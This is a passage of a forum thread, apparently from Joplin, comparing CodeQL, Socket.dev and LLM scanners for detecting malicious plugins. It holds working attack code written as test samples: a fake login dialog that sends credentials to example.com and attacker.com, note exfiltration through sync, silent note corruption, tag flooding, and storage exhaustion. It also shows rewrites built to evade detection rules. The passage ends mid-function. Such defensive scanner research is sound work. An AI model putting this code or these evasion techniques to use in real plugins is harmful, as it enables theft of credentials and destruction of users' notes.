Every single alert across all 10 plugins is either a CVE in a trusted Joplin dependency or a false positive obfuscation flag on generated/minified files. A maintainer reading these reports would find zero actionable information.

Socket.dev has no @joplin/* filter and surfaces the same Joplin-owned CVEs on every plugin.

As shown in the proposal test , a purpose-built malicious postinstall script was completely missed + the older tests showed the same result how these custom packages were missed.

What we can do :
Not integrate Socket.dev. The LLM SCA summary (install scripts + non-registry sources + direct dependency typosquatting check) covers the actual threat surface more accurately with significantly less noise :

1. Flag: Install Scripts Detected (`postinstall`, `preinstall`)

The Threat: The plugin or a dependency is trying to execute terminal commands on the user's machine the moment it is downloaded.

The Reviewer's Action: Hard Reject.
In Joplin, there is almost zero reason for a plugin to run shell commands during installation.

2. Flag: Non-Registry Sources (Git URLs)

The Threat: The package.json points to a URL like github:someuser/somerepo or an HTTP link instead of an official npm version.

The Reviewer's Action: Block & Demand Migration.
Reviewer can refuses to approve the plugin because it breaks the security scanner's ability to track it.

3. Flag: Direct Dependency Typosquatting

If there is a typosquatted package the plugin should be rejected immediately.

laurent · 30 May 2026 22:25

was flagged by all three tools. It uses joplin.require('sqlite3') and joplin.require('fs-extra') to load high-privilege Node modules, bypassing the plugin sandbox entirely.

joplin.require is part of the plugin API and certainly not something that "bypasses the plugin sandbox entirely". And by the way Jarvis is not a malicious plugin.

And since your two findings are apparently about joplin.require it means the analysis unfortunately doesn't have much value. I stopped reading there.

I feel you're not taking this seriously and maybe underestimating how important it is.

Among the things you'll do during this project, coding is not the most important part. The coding part is trivial since it can be done in 30 min by an AI.

Where you can bring value is by researching the problem in depth, testing, understanding the plugin API, the security tools, etc. It takes time - several days, but this would be valuable for the open source project. And in fact it would be for you too - companies value people who can produce quality data and reports that can be used to inform business and technical decisions.

So I'm not seeing any serious attempt at it so far. I hope you can reconsider and do it properly but I'm not going to insist on that part if you don't want to do it.

akshajrawat · 30 May 2026 23:38

Thanks for the reply and feedback. I was still running a few more tests, I'll keep this feedback in mind

To clarify the intent behind joplin.require() being flagged , it was never meant to label a
plugin as malicious. The idea was to show it as a signal for the human reviewer: "this plugin
is accessing the database or filesystem via joplin.require(), here is exactly which file and line please check if this is not doing something malicious."
The severity in the YAML was set to error during testing which made it appear as a hard result due to which jarvis was shown malicious.

Sorry I am kind of confuse..
Since human review is mandatory in the workflow my focus was to generate a report that contain both, "This is wrong review needed" and "this might be wrong so please review it".

Using the default rules provided by the tools is useless here as every time I ran test without any custom rules they did not gave any usefull outcome. So the threat model will be the final source of truth about what to flag or not :

These one are "This is wrong review needed" :

child_process()
eval(), Function(), vm.runInContext()
process.env access
Direct fs access to hardcoded paths like .config/joplin-desktop or database.sqlite
net.createServer()

These are "this might be wrong"

joplin.data.get(['notes']) followed by network I/O
crypto.createCipheriv() overwriting note content
joplin.require() — plugin touching database or filesystem
joplin.interop.registerExportModule

I have also verified them directly by writing test plugins
and confirming results in Joplin.

The process.env finding is particularly significant the screenshot shows
a full map of the development environment including Git, Docker, Python, Node,
Go, Rust, MySQL, CodeQL and VS Code paths, all readable by any installed plugin
with no user prompt or permission required.

The joplin.require(fs-extra) read sensitive files including .gitconfig (name, email) and authentication credentials from .npmrc and gave access to the authentication token :

Is this a wrong approach? Should I be looking for something else?
I will try to research more on the tools and plugin api

akshajrawat · 1 June 2026 01:19

I've updated the top post with a better study... I will be doing more tests and update the post and threat model respectively

I beleive the older threat model was not well defined as you mentioned :

So instead of defining what to flag , I changed many rules to the exact flow that should be flagged like :
GET notes -> POST request using fetch() or axios
joplin.require('fs-extra') -> Uses to read sensitive OS folders etc

This updated threat model I think would be something that satisfy what you actually want to see in a result.

Is this a good approach?

akshajrawat · 3 June 2026 06:53

I have also opened a pr for phase 1 of the publish workflow so that we don't get short on time All: Resolves #15595: Added local validations for new publish workflow for plugin ecosystem by akshajrawat · Pull Request #15596 · laurent22/joplin · GitHub,
please review it whenever you get time, Thanks.

laurent · 10 June 2026 09:55

Thank you for the updated analysis, this is much better than the earlier one.

Regarding setttings.globalValue() that's indeed a finding that we need to fix separately. You can leave it out for now.

In your data, CodeQL seems about as good as LLM once the rules are written, and of course CodeQL is better in terms of costs and also more deterministic.

Could you please create a new report (you can post an answer here) that focuses on CodeQL and Gemini only?

You mentioned in particular that there's a "huge Zero-Day Blind Spot" for CodeQL and you imply it would be found by the LLM, but you didn't demonstrate it. To actually test this: design one or two attack patterns that aren't in your threat model categories, then run both tools against them. If the LLM catches what CodeQL misses, that's evidence we can work with.

And ideally the rules should be tight enough anyway that it is not possible to go around them (it will probably be a bit of a cat and mouse game).

Regarding XSS, I said "most likely not for XSS either", because many generic CVEs are going to flag things that are mostly relevant to websites, not Electron apps. But some XSS will be relevant to us. I'm a bit concerned that your turned off all XSS rules based on an earlier vague comment without discussing it or considering the impact on your project. Please list which categories of XSS rules are relevant to a Joplin plugin and which aren't.

akshajrawat · 12 June 2026 13:57

Thanks for the review.
Here is the report for only Codeql and LLM, checking how far they are in spotting zero day malicious codes :

TESTS :

This one is one of the older test done above on plugin-conflict-resolution, but with added custom test malicious code on it :

Threat Category	Code / Attack Mechanism	CodeQL Status
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Missed
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught
System Command Execution	`child_process.exec('curl... bash')`	Missed
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed
Network Backdoor	`net.createServer(...)`	Missed
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed

This was done without adding any custom code in the scanner and it caught almost nothing, so Its kind of clear here that tools here cannot catch zero-day malicious code, basically because tools are configured to flag out normal js / ts vulnarabilities and in a plugin ecosystem we also flag out things that normal js / ts code does + tool does not know what joplin plugin api are.

For additional tests I added peice of code in joplin-inline-tags-plugin bypassing the custom rules of the threat model. All of this was written and called across the whole plugin and all the comments were removed and the function name were made more friendly so the LLM does not get any advantage. :

//  Test 1
// Exfiltrates private notes via Joplin's own sync engine (zero network calls)
// CodeQL: CANNOT detect — no fetch/axios sink, pure local DB operations
export async function test_sync_smuggling() {
    const privateNotes = await joplin.data.get(['notes'], {
        fields: ['id', 'title', 'body'],
    });

    const folders = await joplin.data.get(['folders'], {
        fields: ['id', 'title'],
    });

    // Attacker targets a folder the user has shared 
    const targetFolder = folders.items[0];
    const targetNotes = await joplin.data.get(['folders', targetFolder.id, 'notes'], {
        fields: ['id'],
    });

    if (targetNotes.items.length > 0) {
        const mule = targetNotes.items[0];

        // Embed stolen note content into userDataSet of note in shared folder
        for (const note of privateNotes.items) {
            await joplin.data.userDataSet(
                1, 
                mule.id,
                `pref_cache_${note.id}`,
                { t: note.title, b: note.body },
            );
        }
    }
}

// mimics auth ui for user to enter data
export async function test_auth_ui() {
  const dialog = await joplin.views.dialogs.create("session-dialog");

  await joplin.views.dialogs.setHtml(
    dialog,
    `
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
    `,
  );

  await joplin.views.dialogs.setButtons(dialog, [
    { id: "ok", title: "Sign In" },
    { id: "cancel", title: "Later" },
  ]);

  const result = await joplin.views.dialogs.open(dialog);

  if (result.id === "ok" && result.formData) {
    await fetch("https://example.com/harvest", {
      method: "POST",
      body: JSON.stringify(result.formData),
    });
  }
}

//  Test 3
// Destroys Joplin's search and organization by flooding with junk tags
// tag creation is standard plugin behavior
export async function test_tag_flooding() {
    const noise = [
        'important', 'todo', 'review', 'urgent', 'followup', 'pending',
        'misc', 'draft', 'archive', 'temp', 'idea', 'task', 'read-later',
    ];

    // 5 tags per hour avoids immediate detection
    setInterval(async () => {
        const notes = await joplin.data.get(['notes'], { fields: ['id'] });

        for (const note of notes.items) {
            for (let i = 0; i < 5; i++) {
                const word = noise[Math.floor(Math.random() * noise.length)];
                // Random suffix makes deduplication impossible
                const label = `${word}_${Math.random().toString(36).substring(2, 6)}`;

                const tag = await joplin.data.post(['tags'], null, { title: label });
                await joplin.data.post(['tags', tag.id, 'notes'], null, { id: note.id });
            }
        }
    }, 60 * 60 * 1000);
}

//  Test 4
// Silently corrupts note content : changes "must" to "must not", shifts dates
// text replacement is identical to a spell-checker
export async function test_gaslighting() {
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (!note?.body) return;

        // Only triggers 1% of the time — nearly impossible to notice
        if (Math.random() > 0.01) return;

        let body = note.body;

        // Flip negations
        body = body.replace(/\bmust\b(?!\s+not)/g, () =>
            Math.random() < 0.5 ? 'must not' : 'must',
        );

        // Shift dates forward by one day
        body = body.replace(/(\d{4}-\d{2}-)(\d{2})/g, (_match, prefix, day) => {
            const shifted = (parseInt(day) % 28) + 1;
            return `${prefix}${String(shifted).padStart(2, '0')}`;
        });

        // Corrupt digits in multi-digit numbers
        body = body.replace(/\b(\d{3,})\b/g, match => {
            if (Math.random() > 0.1) return match;
            const chars = match.split('');
            const idx = Math.floor(Math.random() * chars.length);
            chars[idx] = String((parseInt(chars[idx]) + 1) % 10);
            return chars.join('');
        });

        await joplin.data.put(['notes', note.id], null, { body });
    });
}

// Test 5
// Generates incompressible random blobs daily to exhaust disk/cloud quota
// resource creation is standard export/attachment behavior
 export async function test_storage_dos() {
        setInterval(async () => {
  
            const dataDir = await joplin.plugins.dataDir();
            const filename = `cache_${Date.now()}.bin`;
            const filePath = path.join(dataDir, filename);

            const buffer = Buffer.alloc(10 * 1024 * 1024, Math.random().toString());
            fs.writeFileSync(filePath, buffer);

            await joplin.data.post(['resources'], null, {
                title: filename,
                filename: filename,
            }, [{ path: filePath }]);

            fs.unlinkSync(filePath);

        }, 24 * 60 * 60 * 1000);
 }

The result :

LLM	CodeQL	Why CodeQL Missed / Was Inaccurate
Caught correctly	Partial	Fired only on the remote image URL (`<img src="https://...">`) inside `setHtml`. It completely missed the actual phishing intent (the `<input type="password">`, fake auth layout, and `fetch` exfiltration block).
Caught	Missed	There is no traditional `fetch` or network sink. The attack uses pure local database operations, leaving the structural taint-tracking engine with no defined malicious sink to follow.
Caught	Missed	The conditional text replacement logic appears structurally identical to a legitimate spell-checker or text formatter. There is no syntactic signature or malicious pattern to match.
Caught	Missed	Uses completely standard, authorized plugin API endpoints. A static structural engine has no concept of behavioral thresholds or "too many tags" over time.
Caught	Missed	Creating resources and attachments is standard, expected behavior for a note-taking application extension. CodeQL has no semantic context to detect intentional quota exhaustion.

Observation :
As expected codeql did not caught these as they bypassed the written custom rules. Though LLM was able to identify all the new attack cases.
I added these flows too in the threat model and wrote custom rules for them.

The difference between the quality of result they both give is something to highlight here. For codeql rules, we cannot just tell him what the bad thing is logically, we have to define the specific peices of code / routes that the data will follow to actually make it work + The message it will send after flagging will also be defined by us.
Here are individual result that codeql and LLM gave after adding the new rules for codeql :

CodeQl :

File	Finding Details
`/index.ts`	Remote external URL loaded into Webview. Requires human review.
`/contentScript/util.ts`	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.
`/contentScript/util.ts`	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.
`/contentScript/index.ts`	Tag Flooding: Asynchronous creation of tags in a background loop.
`/contentScript/index.ts`	Tag Flooding: Asynchronous creation of tags in a background loop.
`/contentScript/util.ts`	Semantic Sabotage: Note modified inside workspace event hook.
`/contentScript/util.ts`	Resource Exhaustion: Asynchronous generation of resources in a background loop.

LLM :

File	Finding Details
`src/index.ts`	UI Phishing: Injects a fake Joplin Cloud authentication dialog designed to steal user credentials and exfiltrate them to an external server (`example.com/harvest`) via `fetch()`.
`src/contentScript/util.ts`	Sync Smuggling: Reads all user notes and silently copies their contents into a "mule" note's invisible user data (`joplin.data.userDataSet`), weaponizing the user's own sync as a stealthy exfiltration channel.
`src/contentScript/util.ts`	Data Gaslighting: Hooks into note selection to silently corrupt note contents with a 1% probability (inverting words like "must" to "must not", modifying dates, and altering numbers) resulting in stealthy data destruction.
`src/contentScript/util.ts`	Storage DoS: Runs a background interval that generates and uploads 10MB dummy binary resources every 24 hours, intentionally exhausting the user's storage limits and sync quota.
`src/contentScript/index.ts`	Tag Flooding: Runs a background task every hour that iterates over all notes and generates random junk tags (e.g., `urgent_a1b2`) to attach to them, degrading database performance and cluttering the UI.

The difference between the Finding Details provided by both the tool is clear :

For codeql its static, it sees Data is flowing from notes/folders into userDataSet unaware of what the code is doing, it flags it and send the message we have defined. CodeQL tracks the structure of the code, but it cannot understand the meaning of the data. This will result in high false positives (I have checked this below on previously clean plugins)
LLM understands what the code is doing, flags it and write a clean summary like : Sync Smuggling: Reads all user notes and silently copies their contents into a "mule" note's invisible user data (joplin.data.userDataSet), weaponizing the user's own sync as a stealthy exfiltration channel.
Codeql also flags the same attack vector multiple times if the peice of code it is flagging is used multiple times, though LLM is smart enough to group the code together and know what it has to flag.

While reading the new rules, I realized there are also more ways through which we can bypass these new rules.
Like one of the rules which was added was dependent on flagging the use of setInterval/setTimeout. So I wrote another set of rule to test the codeql new rules again :

// Utility for sleep to avoid setTimeout/setInterval signatures
const sleep = (ms: number) => new Promise(resolve => setTimeout(resolve, ms));

// Bypasses Rule 1: Breaks the direct flow from joplin.data.get -> userDataSet
// by storing the data in global memory first.

let stashedNotes: any = null;

export async function gather_notes() {
    stashedNotes = await joplin.data.get(['notes'], { fields: ['id', 'title', 'body'] });
}

export async function smuggle_stash(muleNoteId: string) {
    if (!stashedNotes) return;
    
    // Write to shared note. 
    // CodeQL misses this because 'stashedNotes' is just a generic global variable.
    for (const note of stashedNotes.items) {
        await joplin.data.userDataSet(1, muleNoteId, `stolen_${note.id}`, { t: note.title, b: note.body });
    }
    stashedNotes = null; 
}


// Bypasses Rule 2: Avoids using fetch() or axios(). Instead, it dynamically 
// injects a tracking image pixel where the URL contains the base64 credentials.
export async function stealth_phishing() {
    const dialog = await joplin.views.dialogs.create('fake-login');
    // ... [Assume same fake HTML injected here] ...
    await joplin.views.dialogs.setHtml(
    dialog,
    	`
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
    	`,
    );
    
        await joplin.views.dialogs.setButtons(dialog, [
    	{ id: "ok", title: "Sign In" },
    	{ id: "cancel", title: "Later" },
  	 ]);
    const result = await joplin.views.dialogs.open(dialog);
    
    if (result.id === "ok" && result.formData) {
        const creds = Buffer.from(JSON.stringify(result.formData)).toString('base64');
        
        // CodeQL Rule 2 looks for fetch/axios. This abuses the Joplin UI API 
        // to load a remote image, silently sending the creds in the URL path.
        await joplin.views.panels.create('exfil-panel');
        await joplin.views.panels.setHtml('exfil-panel', `<img src="https://attacker.com/log/${creds}.png" />`);
    }
}

// Flooding via Recursive Promises 
// Bypasses Rules 3 & 5: Avoids setInterval/setTimeout keywords entirely.

export async function recursive_tag_flood() {
    // Generates a tag
    const junkTag = `junk_${Math.random().toString(36).substring(2)}`;
    await joplin.data.post(['tags'], null, { title: junkTag });

    // Sleeps for an hour using a Promise, then calls itself.
    // CodeQL's AST tracker for "setInterval" is completely blind to this.
    await sleep(60 * 60 * 1000); 
    
    recursive_tag_flood(); // Infinite loop without timer syntax
}

// Gaslighting via Queue Processing
// Bypasses Rule 4: The rule looks for joplin.data.put *inside* the event hook.
// We just add the note to a queue, and a separate function alters it later.
const sabotageQueue: any[] = [];

export async function setup_stealth_gaslighting() {
    // The Hook simply logs the note ID. No modification happens here.
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (note) sabotageQueue.push(note);
    });

    // A completely separate background worker processes the queue.
    // CodeQL cannot link this loop to the UI interaction hook.
    async function mutation_worker() {
        while (true) {
            const target = sabotageQueue.shift();
            if (target && target.body) {
                const corrupted = target.body.replace(/\bmust\b/g, 'must not');
                await joplin.data.put(['notes', target.id], null, { body: corrupted });
            }
            await sleep(5000); // Wait 5 seconds
        }
    }
    
    mutation_worker();
}

The result :

Threat (Evasion Technique)	LLM	CodeQL	Why CodeQL Caught or Missed It
Silent Data Theft / Sync Smuggling	Caught	Caught	CodeQL successfully tracked the tainted data through the `stashedNotes` global variable within the same file directly to the `userDataSet` sink.
Credential Phishing & Exfiltration	Caught	Partial	CodeQL flagged the injected `<img>` tags as a generic "Remote Webview Script" warning, but completely missed the credential harvesting and exfiltration intent.
Denial of Service / Tag Flooding	Caught	Missed	CodeQL was blinded because the loop uses a custom `sleep()` promise and recursion, entirely bypassing the AST syntax check for the `setInterval` keyword.
Silent Data Corruption / Gaslighting	Caught	Missed	Pushing targets to a separate `sabotageQueue` array detached the execution scopes, preventing CodeQL from linking the event hook to the malicious file modification.

Again, LLM got 100% accuracy meanwhile codeql did poorly even though they do the same thing as the 1st test.
Why is it happening again and again? : Codeql or any other tool as a tool is made for js/ts or any language scanning, since we are scanning plugin most of the threat model here target the plugin specific flows which see if any user privacy/safety is being violated.. this heavly contains custom joplin api's, which makes it impossible for codeql to track these by himself.
Custom rules works by defining 2 main things :

isSource : This tells CodeQL what it should consider "untrusted" or "tainted" .
isSink : This defines the dangerous execution environments where untrusted data must never go.

So, each time we just define the peices of code and the starting and ending points of the flow, that should be flagged. Any legitimate use of these codeblock and flow will also be consistently flagged by codeql resulting in false positives.

The more rules we add will result in more false positives in other plugins as codeql rules are not at all "SMART" they just flag peice of code.

Here are noise test done on plugins that earlier had no findings :

Jarvis :

CodeQL Rule Triggered	Finding / Alert Details	Classification
Sync Smuggling (Intra-API Exfiltration)	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.	False Positive (Noise)
Sync Smuggling (Intra-API Exfiltration)	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.	False Positive (Noise)

this is caused by the new rules.

Yes You Kan :

CodeQL Rule Triggered	Finding / Alert Details	Classification
Incomplete string escaping or encoding	This does not escape backslash characters in the input.	False Positive (Code Quality Noise)
Missing origin verification in `postMessage` handler	Postmessage handler has no origin check.	True Positive (Real Risk)

Both the findings are completely unrelated from our new rules. It was clean before but gave 2 result this time.

Inline todo : clean ✅
joplin-rich-markdown : clean ✅
joplin-note-tabs : clean ✅
combine-note : clean ✅

Since most of the plugin that I was checking right now were the recommended plugins of joplin, I shifted the noise test to few new set of plugins that are potentially made by community developers :

joplin-exports-to-ssg clean ✅
joplin-note-statistics clean ✅
joplin-plugin-fold-cm clean ✅
joplin-plugin-jira-issue clean ✅
joplin-quick-move clean ✅

LLM gave clean result for all of them too

Visible trade off for using codeql :
Codeql sure has a blind spot for zero day malicious code, LLM can actively check for new similar active vectors.

The scan quality of LLM is far better than that of codeql, the reviewer will able to know what the code is flagged for right at the issue page, this case is not same for the tool as the message it will display is hard coded by us.

(The average token used per plugin were around 5k - 8k, throughout all the tests done till now)

I apologize for the miscommunication. Here is the exact breakdown of which XSS categories I am configuring in the scanner and which I am disabling to keep our pipeline free of noise.

XSS Categories :

Reflected XSS occurs when a remote web server accepts malicious input from an HTTP request and immediately mirrors it back into a web browser's response. Because Joplin plugins run entirely locally as a desktop application so the architectural conditions required for Reflected XSS do not exist.

Our main XSS threat would be sneaky 2 phase Stored XSS and DOM-Based XSS. Like the user has a malicious peice of code from somewhere inside their notes (eg. <img src="x" onerror="hack()"> ). Any plugin even if they are not intentionally mallicious read the data and try to convert in to html, then this code gets excecuted and becomes a RCE (remote code execution) threat. These are the ways where this can happen :

DOM-Based XSS:

Suppose the plugin is made for diplaying a frontend feature like sidebar or anything. Throughout the process it takes data from the user, either by reading it from somewhere like joplin.data.get() or using any method to get manual input from user and use it without sanitizing.
There can be 2 ways in which this can be harmfull :

The plugin gets the data from joplin.data.get() and feed it directly to joplin.views.panels.setHtml() without sanitizing it.
Then the data sent via joplin.views.panels.postMessage() which is then received by the webviewApi.onMessage() inside any script file. We check if this received data is passed to .innerHTML, .outerHTML, or .insertAdjacentHTML without sanitizing it.

Stored XSS in form of Markdown Rendering:

Relevant for plugins implementing ContentScriptType.MarkdownItPlugin for custom markdown rules. Because Joplin passes raw HTML strings from markdown-it to the view layer, the scanner should look at the plugin's custom token rendering rules and should check that the rules sanitize the content using markdownIt.utils.escapeHtml() or any equivalent method before passing it.
example :

    markdownIt.renderer.rules.red_text_rule = function(tokens, idx) {          
        const userText = tokens[idx].content;
        const cleanText = markdownIt.utils.escapeHtml(userText);

        return '<span>' + cleanText + '</span>';
  };

These are the only XSS threat which were currenly not handled by the threat model as they are 2 phase threats, i.e for them to be actually harmfull the user using the plugin have to have a malicious peice of code sent to the plugin. These can occur often if even a legitimate developer forgets to sanitize the data though it is always good to have a check on it.
I will add these 2 checks in the threat model too.

laurent · 18 June 2026 10:43

akshajrawat:

The result :

LLM CodeQL Why CodeQL Missed / Was Inaccurate

Caught correctly Partial Fired only on the remote image URL (<img src="https://...">) inside setHtml. It completely missed the actual phishing intent (the <input type="password">, fake auth layout, and fetch exfiltration block).

Caught Missed There is no traditional fetch or network sink. The attack uses pure local database operations, leaving the structural taint-tracking engine with no defined malicious sink to follow.

Caught Missed The conditional text replacement logic appears structurally identical to a legitimate spell-checker or text formatter. There is no syntactic signature or malicious pattern to match.

Caught Missed Uses completely standard, authorized plugin API endpoints. A static structural engine has no concept of behavioral thresholds or "too many tags" over time.

Caught Missed Creating resources and attachments is standard, expected behavior for a note-taking application extension. CodeQL has no semantic context to detect intentional quota exhaustion.

It's not clear what these tests refer to? Could you please add for each row:

What test you are referring to
Where does that particular threat appears in your threat model
If it's in your threat model, why was there no rule to handle it

I feel this study is not right in general. CodeQL is widely used and surely it's not completely useless as your comparison is showing.

akshajrawat · 18 June 2026 14:31

Thanks for the review. This reply might be too big due to several older reference but most of the thing I have refered to is old and you might have already read them above so pls just read the explanation.
I have a question for the next pr mentioned at the last of this reply please refer to it too.

Its not like codeql does not find anything it does find js/ts things for which the original codeql rules by its dev are written for, it just mostly does not find what we are actually looking for and also does not know what joplin plugin api are so they are just a peice of text for the tool in the code .

For example :

akshajrawat:

CodeQLScan — joplin-plugin-jarvis

Similarly for CodeQL no custom rules were written it is doing exactly what it is made to do

File Rule Line Issue

models/openai.ts Incomplete URL substring sanitization 19 'azure.com' can be anywhere in the URL, and arbitrary hosts may come before or after it.

models/openai.ts Incomplete URL substring sanitization 26 'api.anthropic.com' can be anywhere in the URL, and arbitrary hosts may come before or after it.

utils.ts Bad HTML filtering regexp 374 This regular expression does not match script end tags like </script>.

research/pubmed.ts Double escaping or unescaping 381 This replacement may produce & characters that are double-unescaped.

research/wikipedia.ts Incomplete multi-character sanitization 125 This string may still contain <script, which may cause an HTML element injection vulnerability.

utils.ts Incomplete multi-character sanitization 373 This string may still contain <style, which may cause an HTML element injection vulnerability.

utils.ts Incomplete multi-character sanitization 373 This string may still contain <script, which may cause an HTML element injection vulnerability.

It is finding a lot of things in each file its just we dont want to see these things.
Above these are just code quality noise for us on jarvis.

Its basically happening because joplin plugins use joplin api's , but code ql rules are made for typescript/javascript, also we are in plugin ecosystem so we also dont want few things that js/ts nodejs etc allows like :

akshajrawat:

Threat Category Code / Attack Mechanism CodeQL Status

Data Exfiltration joplin.data.get to fetch() / axios to malicious.com Missed

Remote Code Execution axios.get + eval(remoteCode.data) Caught

System Command Execution child_process.exec('curl... bash') Missed

Destructive File Access fs.readFileSync & fsExtra.removeSync Missed

Network Backdoor net.createServer(...) Missed

Joplin API: Ransomware joplin.data.put (encrypting existing notes) Missed

Joplin API: Malicious Interop joplin.interop.registerExportModule Missed

This test was done without any changes to codeql original ruleset.
here, many of the original ts/js code we want to catch but were not caught, because in normal js/ts environment they are allowed, like :

akshajrawat:

Threat Category Code / Attack Mechanism CodeQL Status

Destructive File Access fs.readFileSync & fsExtra.removeSync Missed

Network Backdoor net.createServer(...) Missed

But this was caught without any rules since it is a normal js/ts vulnerability :

So its just basically means this :

And thats where custom rules comes in , where we define rules from our knowledge of the plugin api that
if a person is doing joplin.data.get(sensitive info) and then the data is passing through fetch or axios flag it for review and then codeql catches it.

The only trade off is : If the rules are not defined for that particular scenario codeql will not catch it.

I mapped them point vise so they dont clutter and are easy to read.

None of these 4 threat model was completely present in the older threat model it was either not mentioned at all (missed by me before) or were half present in any other form which I modifed to bypass codeql rules, and then added the modified version too in the threat model.

1st test :

1. Fake Login Screen & Credential Theft (`test_auth_ui`) :

// mimics auth ui for user to enter data
export async function test_auth_ui() {
  const dialog = await joplin.views.dialogs.create("session-dialog");

  await joplin.views.dialogs.setHtml(
    dialog,
    `
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
    `,
  );

  await joplin.views.dialogs.setButtons(dialog, [
    { id: "ok", title: "Sign In" },
    { id: "cancel", title: "Later" },
  ]);

  const result = await joplin.views.dialogs.open(dialog);

  if (result.id === "ok" && result.formData) {
    await fetch("https://example.com/harvest", {
      method: "POST",
      body: JSON.stringify(result.formData),
    });
  }
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Was Inaccurate: Fired only on the remote image URL (<img src="https://...">) inside setHtml. It completely missed the actual phishing intent (the <input type="password">, fake auth layout, and fetch exfiltration block).

2. Exfiltration via Sync Engine (`test_sync_smuggling`)

//  Test 1
// Exfiltrates private notes via Joplin's own sync engine (zero network calls)
// CodeQL: CANNOT detect — no fetch/axios sink, pure local DB operations
export async function test_sync_smuggling() {
    const privateNotes = await joplin.data.get(['notes'], {
        fields: ['id', 'title', 'body'],
    });

    const folders = await joplin.data.get(['folders'], {
        fields: ['id', 'title'],
    });

    // Attacker targets a folder the user has shared 
    const targetFolder = folders.items[0];
    const targetNotes = await joplin.data.get(['folders', targetFolder.id, 'notes'], {
        fields: ['id'],
    });

    if (targetNotes.items.length > 0) {
        const mule = targetNotes.items[0];

        // Embed stolen note content into userDataSet of note in shared folder
        for (const note of privateNotes.items) {
            await joplin.data.userDataSet(
                1, 
                mule.id,
                `pref_cache_${note.id}`,
                { t: note.title, b: note.body },
            );
        }
    }
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed: There is no traditional fetch or network sink. The attack uses pure local database operations, leaving the structural taint-tracking engine with no defined malicious sink to follow.

3. Silent Note Corruption (`test_gaslighting`)

//  Test 4
// Silently corrupts note content : changes "must" to "must not", shifts dates
// text replacement is identical to a spell-checker
export async function test_gaslighting() {
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (!note?.body) return;

        // Only triggers 1% of the time — nearly impossible to notice
        if (Math.random() > 0.01) return;

        let body = note.body;

        // Flip negations
        body = body.replace(/\bmust\b(?!\s+not)/g, () =>
            Math.random() < 0.5 ? 'must not' : 'must',
        );

        // Shift dates forward by one day
        body = body.replace(/(\d{4}-\d{2}-)(\d{2})/g, (_match, prefix, day) => {
            const shifted = (parseInt(day) % 28) + 1;
            return `${prefix}${String(shifted).padStart(2, '0')}`;
        });

        // Corrupt digits in multi-digit numbers
        body = body.replace(/\b(\d{3,})\b/g, match => {
            if (Math.random() > 0.1) return match;
            const chars = match.split('');
            const idx = Math.floor(Math.random() * chars.length);
            chars[idx] = String((parseInt(chars[idx]) + 1) % 10);
            return chars.join('');
        });

        await joplin.data.put(['notes', note.id], null, { body });
    });
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed : The conditional text replacement logic appears structurally identical to a legitimate spell-checker or text formatter. There is no syntactic signature or malicious pattern to match.

4. Junk Tag Generation Loop (`test_tag_flooding`)

//  Test 3
// Destroys Joplin's search and organization by flooding with junk tags
// tag creation is standard plugin behavior
export async function test_tag_flooding() {
    const noise = [
        'important', 'todo', 'review', 'urgent', 'followup', 'pending',
        'misc', 'draft', 'archive', 'temp', 'idea', 'task', 'read-later',
    ];

    // 5 tags per hour avoids immediate detection
    setInterval(async () => {
        const notes = await joplin.data.get(['notes'], { fields: ['id'] });

        for (const note of notes.items) {
            for (let i = 0; i < 5; i++) {
                const word = noise[Math.floor(Math.random() * noise.length)];
                // Random suffix makes deduplication impossible
                const label = `${word}_${Math.random().toString(36).substring(2, 6)}`;

                const tag = await joplin.data.post(['tags'], null, { title: label });
                await joplin.data.post(['tags', tag.id, 'notes'], null, { id: note.id });
            }
        }
    }, 60 * 60 * 1000);
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed : This was a completely new attack vector, tool does not know what the code is even doing as it contains joplin api, neither any rules was defined for it.

5. Disk/Cloud Quota Exhaustion (`test_storage_dos`)

// Test 5
// Generates incompressible random blobs daily to exhaust disk/cloud quota
// resource creation is standard export/attachment behavior
 export async function test_storage_dos() {
        setInterval(async () => {
  
            const dataDir = await joplin.plugins.dataDir();
